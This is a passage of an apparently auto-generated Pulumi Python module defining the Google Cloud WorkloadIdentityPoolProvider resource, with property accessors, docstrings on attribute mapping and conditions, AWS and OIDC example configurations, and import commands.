`google.subject` attribute. For example, the following maps the `sub` claim of the
incoming credential to the `subject` attribute on a Google token.
```python
import pulumi
```
:param pulumi.Input['WorkloadIdentityPoolProviderAwsArgs'] aws: An Amazon Web Services identity provider. Not compatible with the property oidc.
Structure is documented below.
:param pulumi.Input[str] description: A description for the provider. Cannot exceed 256 characters.
:param pulumi.Input[bool] disabled: Whether the provider is disabled. You cannot use a disabled provider to exchange tokens.
However, existing tokens still grant access.
:param pulumi.Input[str] display_name: A display name for the provider. Cannot exceed 32 characters.
:param pulumi.Input['WorkloadIdentityPoolProviderOidcArgs'] oidc: An OpenId Connect 1.0 identity provider. Not compatible with the property aws.
Structure is documented below.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
pulumi.set(__self__, "workload_identity_pool_id", workload_identity_pool_id)
pulumi.set(__self__, "workload_identity_pool_provider_id", workload_identity_pool_provider_id)
if attribute_condition is not None:
pulumi.set(__self__, "attribute_condition", attribute_condition)
if attribute_mapping is not None:
pulumi.set(__self__, "attribute_mapping", attribute_mapping)
if aws is not None:
pulumi.set(__self__, "aws", aws)
if description is not None:
pulumi.set(__self__, "description", description)
if disabled is not None:
pulumi.set(__self__, "disabled", disabled)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if oidc is not None:
pulumi.set(__self__, "oidc", oidc)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter(name="workloadIdentityPoolId")
def workload_identity_pool_id(self) -> pulumi.Input[str]:
"""
The ID used for the pool, which is the final component of the pool resource name. This
value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
"""
return pulumi.get(self, "workload_identity_pool_id")
@workload_identity_pool_id.setter
def workload_identity_pool_id(self, value: pulumi.Input[str]):
pulumi.set(self, "workload_identity_pool_id", value)
@property
@pulumi.getter(name="workloadIdentityPoolProviderId")
def workload_identity_pool_provider_id(self) -> pulumi.Input[str]:
"""
The ID for the provider, which becomes the final component of the resource name. This
value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
"""
return pulumi.get(self, "workload_identity_pool_provider_id")
@workload_identity_pool_provider_id.setter
def workload_identity_pool_provider_id(self, value: pulumi.Input[str]):
pulumi.set(self, "workload_identity_pool_provider_id", value)
@property
@pulumi.getter(name="attributeCondition")
def attribute_condition(self) -> Optional[pulumi.Input[str]]:
"""
[A Common Expression Language](https://opensource.google/projects/cel) expression, in
plain text, to restrict what otherwise valid authentication credentials issued by the
provider should not be accepted.
The expression must output a boolean representing whether to allow the federation.
The following keywords may be referenced in the expressions:
* `assertion`: JSON representing the authentication credential issued by the provider.
* `google`: The Google attributes mapped from the assertion in the `attribute_mappings`.
* `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`.
The maximum length of the attribute condition expression is 4096 characters. If
unspecified, all valid authentication credential are accepted.
The following example shows how to only allow credentials with a mapped `google.groups`
value of `admins`:
```python
import pulumi
```
"""
return pulumi.get(self, "attribute_condition")
@attribute_condition.setter
def attribute_condition(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "attribute_condition", value)
@property
@pulumi.getter(name="attributeMapping")
def attribute_mapping(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Maps attributes from authentication credentials issued by an external identity provider
to Google Cloud attributes, such as `subject` and `segment`.
Each key must be a string specifying the Google Cloud IAM attribute to map to.
The following keys are supported:
* `google.subject`: The principal IAM is authenticating. You can reference this value
in IAM bindings. This is also the subject that appears in Cloud Logging logs.
Cannot exceed 127 characters.
* `google.groups`: Groups the external identity belongs to. You can grant groups
access to resources using an IAM `principalSet` binding; access applies to all
members of the group.
You can also provide custom attributes by specifying `attribute.{custom_attribute}`,
where `{custom_attribute}` is the name of the custom attribute to be mapped. You can
define a maximum of 50 custom attributes. The maximum length of a mapped attribute key
is 100 characters, and the key may only contain the characters [a-z0-9_].
You can reference these attributes in IAM policies to define fine-grained access for a
workload to Google Cloud resources. For example:
* `google.subject`:
`principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}`
* `google.groups`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}`
* `attribute.{custom_attribute}`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}`
Each value must be a [Common Expression Language](https://opensource.google/projects/cel)
function that maps an identity provider credential to the normalized attribute specified
by the corresponding map key.
You can use the `assertion` keyword in the expression to access a JSON representation of
the authentication credential issued by the provider.
The maximum length of an attribute mapping expression is 2048 characters. When evaluated,
the total size of all mapped attributes must not exceed 8KB.
For AWS providers, the following rules apply:
- If no attribute mapping is defined, the following default mapping applies:
```python
import pulumi
```
- If any custom attribute mappings are defined, they must include a mapping to the
`google.subject` attribute.
For OIDC providers, the following rules apply:
- Custom attribute mappings must be defined, and must include a mapping to the
`google.subject` attribute. For example, the following maps the `sub` claim of the
incoming credential to the `subject` attribute on a Google token.
```python
import pulumi
```
"""
return pulumi.get(self, "attribute_mapping")
@attribute_mapping.setter
def attribute_mapping(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "attribute_mapping", value)
@property
@pulumi.getter
def aws(self) -> Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']]:
"""
An Amazon Web Services identity provider. Not compatible with the property oidc.
Structure is documented below.
"""
return pulumi.get(self, "aws")
@aws.setter
def aws(self, value: Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']]):
pulumi.set(self, "aws", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description for the provider. Cannot exceed 256 characters.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def disabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the provider is disabled. You cannot use a disabled provider to exchange tokens.
However, existing tokens still grant access.
"""
return pulumi.get(self, "disabled")
@disabled.setter
def disabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disabled", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
A display name for the provider. Cannot exceed 32 characters.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def oidc(self) -> Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']]:
"""
An OpenId Connect 1.0 identity provider. Not compatible with the property aws.
Structure is documented below.
"""
return pulumi.get(self, "oidc")
@oidc.setter
def oidc(self, value: Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']]):
pulumi.set(self, "oidc", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@pulumi.input_type
class _WorkloadIdentityPoolProviderState:
def __init__(__self__, *,
attribute_condition: Optional[pulumi.Input[str]] = None,
attribute_mapping: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
aws: Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
display_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
oidc: Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']] = None,
project: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
workload_identity_pool_id: Optional[pulumi.Input[str]] = None,
workload_identity_pool_provider_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering WorkloadIdentityPoolProvider resources.
:param pulumi.Input[str] attribute_condition: [A Common Expression Language](https://opensource.google/projects/cel) expression, in
plain text, to restrict what otherwise valid authentication credentials issued by the
provider should not be accepted.
The expression must output a boolean representing whether to allow the federation.
The following keywords may be referenced in the expressions:
* `assertion`: JSON representing the authentication credential issued by the provider.
* `google`: The Google attributes mapped from the assertion in the `attribute_mappings`.
* `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`.
The maximum length of the attribute condition expression is 4096 characters. If
unspecified, all valid authentication credential are accepted.
The following example shows how to only allow credentials with a mapped `google.groups`
value of `admins`:
```python
import pulumi
```
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] attribute_mapping: Maps attributes from authentication credentials issued by an external identity provider
to Google Cloud attributes, such as `subject` and `segment`.
Each key must be a string specifying the Google Cloud IAM attribute to map to.
The following keys are supported:
* `google.subject`: The principal IAM is authenticating. You can reference this value
in IAM bindings. This is also the subject that appears in Cloud Logging logs.
Cannot exceed 127 characters.
* `google.groups`: Groups the external identity belongs to. You can grant groups
access to resources using an IAM `principalSet` binding; access applies to all
members of the group.
You can also provide custom attributes by specifying `attribute.{custom_attribute}`,
where `{custom_attribute}` is the name of the custom attribute to be mapped. You can
define a maximum of 50 custom attributes. The maximum length of a mapped attribute key
is 100 characters, and the key may only contain the characters [a-z0-9_].
You can reference these attributes in IAM policies to define fine-grained access for a
workload to Google Cloud resources. For example:
* `google.subject`:
`principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}`
* `google.groups`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}`
* `attribute.{custom_attribute}`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}`
Each value must be a [Common Expression Language](https://opensource.google/projects/cel)
function that maps an identity provider credential to the normalized attribute specified
by the corresponding map key.
You can use the `assertion` keyword in the expression to access a JSON representation of
the authentication credential issued by the provider.
The maximum length of an attribute mapping expression is 2048 characters. When evaluated,
the total size of all mapped attributes must not exceed 8KB.
For AWS providers, the following rules apply:
- If no attribute mapping is defined, the following default mapping applies:
```python
import pulumi
```
- If any custom attribute mappings are defined, they must include a mapping to the
`google.subject` attribute.
For OIDC providers, the following rules apply:
- Custom attribute mappings must be defined, and must include a mapping to the
`google.subject` attribute. For example, the following maps the `sub` claim of the
incoming credential to the `subject` attribute on a Google token.
```python
import pulumi
```
:param pulumi.Input['WorkloadIdentityPoolProviderAwsArgs'] aws: An Amazon Web Services identity provider. Not compatible with the property oidc.
Structure is documented below.
:param pulumi.Input[str] description: A description for the provider. Cannot exceed 256 characters.
:param pulumi.Input[bool] disabled: Whether the provider is disabled. You cannot use a disabled provider to exchange tokens.
However, existing tokens still grant access.
:param pulumi.Input[str] display_name: A display name for the provider. Cannot exceed 32 characters.
:param pulumi.Input[str] name: The resource name of the provider as
'projects/{project_number}/locations/global/workloadIdentityPools/{workload_identity_pool_id}/providers/{workload_identity_pool_provider_id}'.
:param pulumi.Input['WorkloadIdentityPoolProviderOidcArgs'] oidc: An OpenId Connect 1.0 identity provider. Not compatible with the property aws.
Structure is documented below.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] state: The state of the provider. * STATE_UNSPECIFIED: State unspecified. * ACTIVE: The provider is active, and may be used to
validate authentication credentials. * DELETED: The provider is soft-deleted. Soft-deleted providers are permanently
deleted after approximately 30 days. You can restore a soft-deleted provider using UndeleteWorkloadIdentityPoolProvider.
You cannot reuse the ID of a soft-deleted provider until it is permanently deleted.
:param pulumi.Input[str] workload_identity_pool_id: The ID used for the pool, which is the final component of the pool resource name. This
value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
:param pulumi.Input[str] workload_identity_pool_provider_id: The ID for the provider, which becomes the final component of the resource name. This
value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
"""
if attribute_condition is not None:
pulumi.set(__self__, "attribute_condition", attribute_condition)
if attribute_mapping is not None:
pulumi.set(__self__, "attribute_mapping", attribute_mapping)
if aws is not None:
pulumi.set(__self__, "aws", aws)
if description is not None:
pulumi.set(__self__, "description", description)
if disabled is not None:
pulumi.set(__self__, "disabled", disabled)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if name is not None:
pulumi.set(__self__, "name", name)
if oidc is not None:
pulumi.set(__self__, "oidc", oidc)
if project is not None:
pulumi.set(__self__, "project", project)
if state is not None:
pulumi.set(__self__, "state", state)
if workload_identity_pool_id is not None:
pulumi.set(__self__, "workload_identity_pool_id", workload_identity_pool_id)
if workload_identity_pool_provider_id is not None:
pulumi.set(__self__, "workload_identity_pool_provider_id", workload_identity_pool_provider_id)
@property
@pulumi.getter(name="attributeCondition")
def attribute_condition(self) -> Optional[pulumi.Input[str]]:
"""
[A Common Expression Language](https://opensource.google/projects/cel) expression, in
plain text, to restrict what otherwise valid authentication credentials issued by the
provider should not be accepted.
The expression must output a boolean representing whether to allow the federation.
The following keywords may be referenced in the expressions:
* `assertion`: JSON representing the authentication credential issued by the provider.
* `google`: The Google attributes mapped from the assertion in the `attribute_mappings`.
* `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`.
The maximum length of the attribute condition expression is 4096 characters. If
unspecified, all valid authentication credential are accepted.
The following example shows how to only allow credentials with a mapped `google.groups`
value of `admins`:
```python
import pulumi
```
"""
return pulumi.get(self, "attribute_condition")
@attribute_condition.setter
def attribute_condition(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "attribute_condition", value)
@property
@pulumi.getter(name="attributeMapping")
def attribute_mapping(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Maps attributes from authentication credentials issued by an external identity provider
to Google Cloud attributes, such as `subject` and `segment`.
Each key must be a string specifying the Google Cloud IAM attribute to map to.
The following keys are supported:
* `google.subject`: The principal IAM is authenticating. You can reference this value
in IAM bindings. This is also the subject that appears in Cloud Logging logs.
Cannot exceed 127 characters.
* `google.groups`: Groups the external identity belongs to. You can grant groups
access to resources using an IAM `principalSet` binding; access applies to all
members of the group.
You can also provide custom attributes by specifying `attribute.{custom_attribute}`,
where `{custom_attribute}` is the name of the custom attribute to be mapped. You can
define a maximum of 50 custom attributes. The maximum length of a mapped attribute key
is 100 characters, and the key may only contain the characters [a-z0-9_].
You can reference these attributes in IAM policies to define fine-grained access for a
workload to Google Cloud resources. For example:
* `google.subject`:
`principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}`
* `google.groups`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}`
* `attribute.{custom_attribute}`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}`
Each value must be a [Common Expression Language](https://opensource.google/projects/cel)
function that maps an identity provider credential to the normalized attribute specified
by the corresponding map key.
You can use the `assertion` keyword in the expression to access a JSON representation of
the authentication credential issued by the provider.
The maximum length of an attribute mapping expression is 2048 characters. When evaluated,
the total size of all mapped attributes must not exceed 8KB.
For AWS providers, the following rules apply:
- If no attribute mapping is defined, the following default mapping applies:
```python
import pulumi
```
- If any custom attribute mappings are defined, they must include a mapping to the
`google.subject` attribute.
For OIDC providers, the following rules apply:
- Custom attribute mappings must be defined, and must include a mapping to the
`google.subject` attribute. For example, the following maps the `sub` claim of the
incoming credential to the `subject` attribute on a Google token.
```python
import pulumi
```
"""
return pulumi.get(self, "attribute_mapping")
@attribute_mapping.setter
def attribute_mapping(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "attribute_mapping", value)
@property
@pulumi.getter
def aws(self) -> Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']]:
"""
An Amazon Web Services identity provider. Not compatible with the property oidc.
Structure is documented below.
"""
return pulumi.get(self, "aws")
@aws.setter
def aws(self, value: Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']]):
pulumi.set(self, "aws", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description for the provider. Cannot exceed 256 characters.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def disabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the provider is disabled. You cannot use a disabled provider to exchange tokens.
However, existing tokens still grant access.
"""
return pulumi.get(self, "disabled")
@disabled.setter
def disabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disabled", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
A display name for the provider. Cannot exceed 32 characters.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The resource name of the provider as
'projects/{project_number}/locations/global/workloadIdentityPools/{workload_identity_pool_id}/providers/{workload_identity_pool_provider_id}'.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def oidc(self) -> Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']]:
"""
An OpenId Connect 1.0 identity provider. Not compatible with the property aws.
Structure is documented below.
"""
return pulumi.get(self, "oidc")
@oidc.setter
def oidc(self, value: Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']]):
pulumi.set(self, "oidc", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
The state of the provider. * STATE_UNSPECIFIED: State unspecified. * ACTIVE: The provider is active, and may be used to
validate authentication credentials. * DELETED: The provider is soft-deleted. Soft-deleted providers are permanently
deleted after approximately 30 days. You can restore a soft-deleted provider using UndeleteWorkloadIdentityPoolProvider.
You cannot reuse the ID of a soft-deleted provider until it is permanently deleted.
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="workloadIdentityPoolId")
def workload_identity_pool_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID used for the pool, which is the final component of the pool resource name. This
value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
"""
return pulumi.get(self, "workload_identity_pool_id")
@workload_identity_pool_id.setter
def workload_identity_pool_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "workload_identity_pool_id", value)
@property
@pulumi.getter(name="workloadIdentityPoolProviderId")
def workload_identity_pool_provider_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID for the provider, which becomes the final component of the resource name. This
value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
"""
return pulumi.get(self, "workload_identity_pool_provider_id")
@workload_identity_pool_provider_id.setter
def workload_identity_pool_provider_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "workload_identity_pool_provider_id", value)
class WorkloadIdentityPoolProvider(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
attribute_condition: Optional[pulumi.Input[str]] = None,
attribute_mapping: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
aws: Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
display_name: Optional[pulumi.Input[str]] = None,
oidc: Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']]] = None,
project: Optional[pulumi.Input[str]] = None,
workload_identity_pool_id: Optional[pulumi.Input[str]] = None,
workload_identity_pool_provider_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
A configuration for an external identity provider.
To get more information about WorkloadIdentityPoolProvider, see:
* [API documentation](https://cloud.google.com/iam/docs/reference/rest/v1beta/projects.locations.workloadIdentityPools.providers)
* How-to Guides
* [Managing workload identity providers](https://cloud.google.com/iam/docs/manage-workload-identity-pools-providers#managing_workload_identity_providers)
## Example Usage
### Iam Workload Identity Pool Provider Aws Basic
```python
import pulumi
import pulumi_gcp as gcp
pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool",
opts=pulumi.ResourceOptions(provider=google_beta))
example = gcp.iam.WorkloadIdentityPoolProvider("example",
workload_identity_pool_id=pool.workload_identity_pool_id,
workload_identity_pool_provider_id="example-prvdr",
aws=gcp.iam.WorkloadIdentityPoolProviderAwsArgs(
account_id="999999999999",
),
opts=pulumi.ResourceOptions(provider=google_beta))
```
### Iam Workload Identity Pool Provider Aws Full
```python
import pulumi
import pulumi_gcp as gcp
pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool",
opts=pulumi.ResourceOptions(provider=google_beta))
example = gcp.iam.WorkloadIdentityPoolProvider("example",
workload_identity_pool_id=pool.workload_identity_pool_id,
workload_identity_pool_provider_id="example-prvdr",
display_name="Name of provider",
description="AWS identity pool provider for automated test",
disabled=True,
attribute_condition="attribute.aws_role==\"arn:aws:sts::999999999999:assumed-role/stack-eu-central-1-lambdaRole\"",
attribute_mapping={
"google.subject": "assertion.arn",
"attribute.aws_account": "assertion.account",
"attribute.environment": "assertion.arn.contains(\":instance-profile/Production\") ? \"prod\" : \"test\"",
},
aws=gcp.iam.WorkloadIdentityPoolProviderAwsArgs(
account_id="999999999999",
),
opts=pulumi.ResourceOptions(provider=google_beta))
```
### Iam Workload Identity Pool Provider Oidc Basic
```python
import pulumi
import pulumi_gcp as gcp
pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool",
opts=pulumi.ResourceOptions(provider=google_beta))
example = gcp.iam.WorkloadIdentityPoolProvider("example",
workload_identity_pool_id=pool.workload_identity_pool_id,
workload_identity_pool_provider_id="example-prvdr",
attribute_mapping={
"google.subject": "assertion.sub",
},
oidc=gcp.iam.WorkloadIdentityPoolProviderOidcArgs(
issuer_uri="https://sts.windows.net/azure-tenant-id",
),
opts=pulumi.ResourceOptions(provider=google_beta))
```
### Iam Workload Identity Pool Provider Oidc Full
```python
import pulumi
import pulumi_gcp as gcp
pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool",
opts=pulumi.ResourceOptions(provider=google_beta))
example = gcp.iam.WorkloadIdentityPoolProvider("example",
workload_identity_pool_id=pool.workload_identity_pool_id,
workload_identity_pool_provider_id="example-prvdr",
display_name="Name of provider",
description="OIDC identity pool provider for automated test",
disabled=True,
attribute_condition="\"e968c2ef-047c-498d-8d79-16ca1b61e77e\" in assertion.groups",
attribute_mapping={
"google.subject": "\"azure::\" + assertion.tid + \"::\" + assertion.sub",
"attribute.tid": "assertion.tid",
"attribute.managed_identity_name": \"\"\" {
"8bb39bdb-1cc5-4447-b7db-a19e920eb111":"workload1",
"55d36609-9bcf-48e0-a366-a3cf19027d2a":"workload2"
}[assertion.oid]
\"\"\",
},
oidc=gcp.iam.WorkloadIdentityPoolProviderOidcArgs(
allowed_audiences=[
"https://example.com/gcp-oidc-federation",
"example.com/gcp-oidc-federation",
],
issuer_uri="https://sts.windows.net/azure-tenant-id",
),
opts=pulumi.ResourceOptions(provider=google_beta))
```
## Import
WorkloadIdentityPoolProvider can be imported using any of these accepted formats
```sh
$ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default projects/{{project}}/locations/global/workloadIdentityPools/{{workload_identity_pool_id}}/providers/{{workload_identity_pool_provider_id}}
```
```sh
$ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default {{project}}/{{workload_identity_pool_id}}/{{workload_identity_pool_provider_id}}
```
```sh
$ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default {{workload_identity_pool_id}}/{{workload_identity_pool_provider_id}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] attribute_condition: [A Common Expression Language](https://opensource.google/projects/cel) expression, in
plain text, to restrict what otherwise valid authentication credentials issued by the
provider should not be accepted.
The expression must output a boolean representing whether to allow the federation.
The following keywords may be referenced in the expressions:
* `assertion`: JSON representing the authentication credential issued by the provider.
* `google`: The Google attributes mapped from the assertion in the `attribute_mappings`.
* `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`.
The maximum length of the attribute condition expression is 4096 characters. If
unspecified, all valid authentication credential are accepted.
The following example shows how to only allow credentials with a mapped `google.groups`
value of `admins`:
```python
import pulumi
```
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] attribute_mapping: Maps attributes from authentication credentials issued by an external identity provider
to Google Cloud attributes, such as `subject` and `segment`.
Each key must be a string specifying the Google Cloud IAM attribute to map to.
The following keys are supported:
* `google.subject`: The principal IAM is authenticating. You can reference this value
in IAM bindings. This is also the subject that appears in Cloud Logging logs.
Cannot exceed 127 characters.
* `google.groups`: Groups the external identity belongs to. You can grant groups
access to resources using an IAM `principalSet` binding; access applies to all
members of the group.
You can also provide custom attributes by specifying `attribute.{custom_attribute}`,
where `{custom_attribute}` is the name of the custom attribute to be mapped. You can
define a maximum of 50 custom attributes. The maximum length of a mapped attribute key
is 100 characters, and the key may only contain the characters [a-z0-9_].
You can reference these attributes in IAM policies to define fine-grained access for a
workload to Google Cloud resources. For example:
* `google.subject`:
`principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}`
* `google.groups`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}`
* `attribute.{custom_attribute}`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}`
Each value must be a [Common Expression Language](https://opensource.google/projects/cel)
function that maps an identity provider credential to the normalized attribute specified
by the corresponding map key.
You can use the `assertion` keyword in the expression to access a JSON representation of
the authentication credential issued by the provider.
The maximum length of an attribute mapping expression is 2048 characters. When evaluated,
the total size of all mapped attributes must not exceed 8KB.
For AWS providers, the following rules apply:
- If no attribute mapping is defined, the following default mapping applies:
```python
import pulumi
```
- If any custom attribute mappings are defined, they must include a mapping to the
`google.subject` attribute.
For OIDC providers, the following rules apply:
- Custom attribute mappings must be defined, and must include a mapping to the
`google.subject` attribute. For example, the following maps the `sub` claim of the
incoming credential to the `subject` attribute on a Google token.
```python
import pulumi
```
:param pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']] aws: An Amazon Web Services identity provider. Not compatible with the property oidc.
Structure is documented below.
:param pulumi.Input[str] description: A description for the provider. Cannot exceed 256 characters.
:param pulumi.Input[bool] disabled: Whether the provider is disabled. You cannot use a disabled provider to exchange tokens.
However, existing tokens still grant access.
:param pulumi.Input[str] display_name: A display name for the provider. Cannot exceed 32 characters.
:param pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']] oidc: An OpenId Connect 1.0 identity provider. Not compatible with the property aws.
Structure is documented below.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] workload_identity_pool_id: The ID used for the pool, which is the final component of the pool resource name. This
value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
:param pulumi.Input[str] workload_identity_pool_provider_id: The ID for the provider, which becomes the final component of the resource name. This
value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: WorkloadIdentityPoolProviderArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A configuration for an external identity provider.
To get more information about WorkloadIdentityPoolProvider, see:
* [API documentation](https://cloud.google.com/iam/docs/reference/rest/v1beta/projects.locations.workloadIdentityPools.providers)
* How-to Guides
* [Managing workload identity providers](https://cloud.google.com/iam/docs/manage-workload-identity-pools-providers#managing_workload_identity_providers)
## Example Usage
### Iam Workload Identity Pool Provider Aws Basic
```python
import pulumi
import pulumi_gcp as gcp
pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool",
opts=pulumi.ResourceOptions(provider=google_beta))
example = gcp.iam.WorkloadIdentityPoolProvider("example",
workload_identity_pool_id=pool.workload_identity_pool_id,
workload_identity_pool_provider_id="example-prvdr",
aws=gcp.iam.WorkloadIdentityPoolProviderAwsArgs(
account_id="999999999999",
),
opts=pulumi.ResourceOptions(provider=google_beta))
```
### Iam Workload Identity Pool Provider Aws Full
```python
import pulumi
import pulumi_gcp as gcp
pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool",
opts=pulumi.ResourceOptions(provider=google_beta))
example = gcp.iam.WorkloadIdentityPoolProvider("example",
workload_identity_pool_id=pool.workload_identity_pool_id,
workload_identity_pool_provider_id="example-prvdr",
display_name="Name of provider",
description="AWS identity pool provider for automated test",
disabled=True,
attribute_condition="attribute.aws_role==\"arn:aws:sts::999999999999:assumed-role/stack-eu-central-1-lambdaRole\"",
attribute_mapping={
"google.subject": "assertion.arn",
